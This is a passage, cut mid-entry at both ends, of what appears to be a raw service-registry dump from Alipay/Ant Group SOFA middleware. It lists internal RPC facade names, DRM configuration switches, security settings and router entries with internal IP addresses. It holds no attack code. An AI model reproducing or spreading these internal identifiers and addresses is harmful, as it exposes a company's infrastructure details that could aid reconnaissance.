D#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:complianceAuditPreCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.AntBottomWordsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.clientGrayPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceLibraryMngQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.maxLoadNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.core.service.h5.H5FlowPhoneCfgDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.service.facade.wealth.WealthKgService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.common.biz.facade.api.TeamOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.msgcenter.api.RetryTaskScheduleApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.selfhelp.AuthTokenInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.payment.common.api.AssetConsultService:1.0:creditutcoreAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.pcredit.PcreditActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataservice.common.service.facade.BizOrderExtQueryService:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.api.decision.CreditServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.remittanceagent.RemittanceAgentPhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.accountgold.CommoditiesAccGoldTransferOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.category.api.InsCategoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csinsight.common.service.facade.api.TableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.NewAccountService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientControlDRM.convertModeRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpdcore:name=com.alipay.fin.pdcore.common.util.drm.DbDrmConfigure.applicationDbNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.mordercenter.KouBeiFacePayInvokeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.biz.api.manager.DemoGenerateServiceManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frscenter.common.service.facade.api.RiskFactorObjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.ShelfStickFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.AdminUserShowRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mdeduct.common.service.facade.agreement.UsageAgreementRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.voucherprod.facade.api.rule.VcpVoucherRuleFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobatch.common.service.task.facade.DataMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","finrtcalcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bizrecon.facade.ext.QueryAlipayDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksupplychainprod.common.service.facade.ticket.api.ScpTicketDebtQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.OracleDepositbackInstructionQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.masterdata.common.service.facade.MasterDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.88.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sendNormalPreCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.account.ContentAppStatQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:bkfrontendbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ArBatchOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.order.MerchantOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.AntProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:airbopsMobileDecision_rollbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ShopQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.event.common.service.facade.service.AntEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.lifeprod.common.service.facade.api.advert.LifeAdvertAddressQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceApiInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icrowdservice.facade.tag.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCompanyRuleManager.currentEnvStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.150.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.flowdecision.facade.api.FlowDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.31.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.metadatacenter.facade.api.RiskItemRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.businesstype.api.BusinessTypeMapManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:apfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.storeValidateDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.mif.common.service.facade.MerchantShopCzonePageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antfin.inclusionconf.facade.service.ticket.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ICROWDSERVICE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.company.facade.CompanyContentMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.stream.facade.StreamMonitorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcinstdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:fundcardprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdSellerAdmitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_loanHold@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.supportMinPdVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.service.facade.eco.EcoDetectFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfas.core.service.api.InwardPaymentProcessService:1.0:remitInwardPayProcessService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.178.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.scene.AwardLoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.RuleSetQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:tvprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.ardd.common.support.api.BizIdentityDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.221.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paylink.service.facade.PrizeDistributeManualTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.client.drm.DataSwapAllClientDrmResource.properties,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_M_MOA_INTERNAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmember.common.service.facade.BenefitConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.redirectTarget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iradar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitymarketscore.common.service.facade.api.NoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.app.AppAdvanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tsm.common.service.prodmgn.facade.rpc.TsmProdMgnServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BKASSETMORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.179.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditagreement.guaranteeAgreementExpire@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.recruit.api.RecruitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.merchant.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zpaas:name=com.alipay.zpaas.biz.ops.common.ReleaseWindowDrmResource.unableReleaseWindows,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.malgo.common.facade.struct.OraConstraintGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.biz.shared.snapshot.RetrySnapshotRecordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.resultwrap:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.pcreditagreement.common.service.agreement.org.PcreditOrgAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.159.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acticketmng.common.service.facade.api.manage.ApiCipherManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.commonfund.api.CftransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.FactTableQueryOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KBASECORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.cashing.service.CashingProductPublishFailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_CREDIT_LDC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","pvsofaserver@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.CommonLabelFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mcomment.common.service.facade.comment.CollectUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.ScenePromoUserOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.neardata.query.api.SalesQueryClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.MobileFamilyAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.yunyou.spi.v1_0.risk.RiskSpiFacade:1.0:acnwglobal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.credit.fulfill.platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:promoplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bmw.coresrv.FlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IMASP#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dchainconfigcenter.facade.file.api.FilesService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tss.cptor.common.service.facade.CommonCptorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.patrol.rule.PatrolAppRuleManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.190.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.merchant.member.facade.api.MemberRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.content.ContentAggregationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityservice.facade.activeservice.ActiveProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IAntJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opencore:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fraudmng.common.service.facade.infocode.InfocodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue1:e#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.172.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpaas.zappinfo.facade.update.ServerPackageUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SceneGroupRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cif:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.139.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.paymentmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.biz.share.manager.EinvInvoiceCreateManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.164.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mpromocenter.common.service.facade.activity.api.MerchantActivityQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.config.ContactTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.calendar.CalendarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.trade.TradeIsvOrgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:workflowMatterAfterCreateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaBizChangeDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.iot.tangula.facade.customize.CustomizeSolutionService:1.0:tangula@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.ecologyPointFundPlanId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.fuse.FuseWarningSendService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_USERPRIVILEGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.yeb.YebTransOutAckCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.core.engine.front.service.DataRecoverService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.giftprod.common.config.drm.wufu2020.ActivityTaskDrm.onlineDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_devicemtn_roleOrderSettingFront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.score.facade.UserScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:instservicecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alphasecmng:name=com.alipay.assay.web.home.drm.PermissionControlDrm.specialPermissionValidatorCollections,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:exratecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@insclaiminvestcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.imtmsvcprod.common.service.facade.face.StandardFaceSignInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerSecurityFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_topic_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasecore.service.v2.stream.facade.ClusterRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.ebpp.ThirdPartyChargeInstServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.MobileDecisionConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.244.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:cem#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insclaiminvestprod.facade.system.DataMoveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:cors@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.biz.service.ReflectInvokeMethodService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.alipayauth.AlipayAuthMobileEwcFaceProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecuprodTrendInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.openplatform.common.service.THubAccountPoolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:decisionx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintabcore.common.service.facade.api.PmtPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.CreativeDeliverFacadeV2:1.0:ucdpcore-finance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.BannerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.cpc.KbCpcInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.InsMktProdAppCampaignCenterQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antmembermng_schemaDataConfig_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.rockfuzz.common.service.facade.FuzzRepositoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zcache.tbase.igtransferprodTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.LiquidateInstructionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycenter.common.service.facade.nac.AntCloudSyncNacAccServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_GUARDS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseAdminFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.15.250.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.ngfeap_lindorm_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insdataprod.common.service.facade.reservation.api.DSBReservationRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.openhome:name=com.alipay.tutorial.msgbroker.drm.DrmDemo.age,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openPassCertifyTimeCheckStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dbackprod.service.facade.api.ApplyTransferToAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_MCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmember.common.service.facade.goldeneye.PatekGoldenEyeExperimentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.insproductcore.facade.service.InsPriceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.alphad.common.service.facade.business.api.IBusinessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.degradationSwitch,version=3.0@DRM#@